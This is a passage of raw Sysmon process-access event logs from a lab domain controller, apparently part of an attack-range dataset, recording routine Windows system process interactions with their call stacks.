combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405756C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405936C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405932C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405924C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405928C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.429{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.429{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.429{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.429{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.429{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.429{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.429{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.429{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.429{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.429{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.429{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+bf29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.414{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\combase.dll+567e1|C:\Windows\System32\combase.dll+56e0d 10341000x800000000000000012100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.414{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\combase.dll+567e1|C:\Windows\System32\combase.dll+56e0d 10341000x800000000000000012099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
